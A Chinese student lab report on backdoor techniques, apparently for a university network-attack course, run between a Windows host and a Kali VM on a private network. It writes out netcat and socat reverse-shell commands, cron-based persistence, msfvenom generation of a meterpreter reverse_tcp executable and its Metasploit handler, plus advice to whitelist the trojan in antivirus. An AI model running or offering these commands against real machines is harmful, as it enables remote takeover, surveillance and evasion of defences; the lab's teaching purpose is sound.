20145232韩文浩《网络对抗》 后门原理与实践
实验内容
windows主机与kali虚拟机实现互联互通
在Windows下,先使用ipconfig
指令查看本机IP:
192.168.31.129
在Linux下,先使用ifconfig
指令查看本机IP:
192.168.31.132
windows开启监听端口:
kali发起连接请求:
使用netcat获取主机操作Shell,cron启动
Windows获得Linux的Shell
在windows上打开cmd,并通过ncat开放端口5232
在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5232端口:
Windows下成功获得了一个Kali的shell,运行ls指令如下:
使用cron定时连接:crontab指令增加一条定时任务,-e表示编辑,接下来会进入编辑状态,在最后一行参照之前的格式加入一条自动执行netcat的指令即可
设定59分时自动开启,所以当主机时间到了59分时,就可以获取kali的shell了
Linux获得Windows的Shell
同上述操作,在linux下设置监听端口:nc -l -p 5232
在windows下请求连接:ncat 192.168.31.132 5232 -e cmd.exe
在linux下输入ipconfig查看主机IP:
使用socat获取主机操作Shell, 任务计划启动
在windows上开放5232
端口,并把cmd的stderr重定向到stdout
socat tcp-listen:5232 exec:cmd,pty,stderr
在linux开启监听:socat - tcp:192.168.31.129:5232
使用MSF meterpreter生成可执行文件
通过meterpreter生成后门程序:20145232.exe
linux下输入指令:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.132 LPORT=80 -f exe > 20145232.exe
接下来需要将这个后门程序传到我们的靶机上,可以通过ncat来实现
首先我在win的cmd下使用ncat.exe -lv 443 > 20145232.exe
命令在443号端口进行监听
然后在Linux下使用ncat -nv 172.20.10.2 443 < 20145232.exe
命令把文件传送过去
使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
MSF打开监听进程
msfconsole:进入msf
use exploit/multi/handler:进入handler模式
set payload windows/meterpreter/reverse_tcp:设置payload
show options:查看当前信息状态
set LHOST 192.168.31.132:设置LHOST
set LPORT 80:设置LPORT
exploit:MSF开始监听
在windows下打开运行20145232.exe
木马程序,此时杀毒软件可能会报毒,点击找回文件并添加到信任区即可,然后就可以在linux攻击机上取得靶机的shell了
通过screenshot进行屏幕截图
通过run metsvc
为主机安装一些系统服务
问题回答
1、例举你能想到的一个后门进入到你系统中的可能方式?
下载一个非官方的应用,利用后门窃取用户隐私
2、例举你知道的后门如何启动起来(win及linux)的方式?
win下作为一个EXE通过用户点击,修改注册表,添加自启动项
Linux下可以通过crontab来定时启动
3、Meterpreter有哪些给你映像深刻的功能?
Meterpreter功能很强大,可以实现许多功能,提醒我们平时注意电脑安全隐患
4、如何发现自己有系统有没有被安装后门?
检查防火墙,使用安全杀毒软件,定期更新病毒库,定期杀毒。手动在开机自启动项中关闭可疑的程序